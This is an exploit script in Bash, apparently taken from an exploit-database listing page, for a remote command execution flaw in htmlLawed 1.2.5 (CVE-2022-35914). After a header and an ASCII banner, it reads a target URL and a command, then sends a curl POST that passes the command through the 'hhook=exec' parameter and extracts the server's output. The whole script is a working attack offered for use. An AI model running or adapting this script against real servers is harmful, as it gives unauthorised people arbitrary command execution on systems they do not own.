094f6f9304
7 changes to exploits/shellcodes/ghdb Apache OFBiz 18.12.12 - Directory Traversal Backdrop CMS 1.27.1 - Remote Command Execution (RCE) htmlLawed 1.2.5 - Remote Code Execution (RCE) PopojiCMS 2.0.1 - Remote Command Execution (RCE) Rocket LMS 1.9 - Persistent Cross Site Scripting (XSS) Wordpress Theme XStore 9.3.8 - SQLi
35 lines
No EOL
1.2 KiB
Bash
Executable file
35 lines
No EOL
1.2 KiB
Bash
Executable file
# Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE)
|
|
# Date: 2024-04-24
|
|
# Exploit Author: Miguel Redondo (aka d4t4s3c)
|
|
# Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
|
|
# Software Link: https://github.com/kesar/HTMLawed
|
|
# Version: <= 1.2.5
|
|
# Tested on: Linux
|
|
# CVE: CVE-2022-35914
|
|
|
|
banner(){
|
|
echo " ______ _______ ____ ___ ____ ____ _________ ___ _ _ _"
|
|
echo " / ___\ \ / / ____| |___ \ / _ \___ \|___ \ |___ / ___|/ _ \/ | || |"
|
|
echo "| | \ \ / /| _| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_"
|
|
echo "| |___ \ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|"
|
|
echo " \____| \_/ |_____| |_____|\___/_____|_____| |____/____/ /_/|_| |_|"
|
|
}
|
|
|
|
while getopts ":u:c:" arg; do
|
|
case $arg in
|
|
u) URL=$OPTARG; let parameter_counter+=1 ;;
|
|
c) CMD=$OPTARG; let parameter_counter+=1 ;;
|
|
esac
|
|
done
|
|
|
|
|
|
if [ -z "$URL" ] || [ -z "$CMD" ]; then
|
|
banner
|
|
echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n"
|
|
exit
|
|
else
|
|
banner
|
|
echo -e "\n[+] Command output:"
|
|
fi
|
|
|
|
curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/' |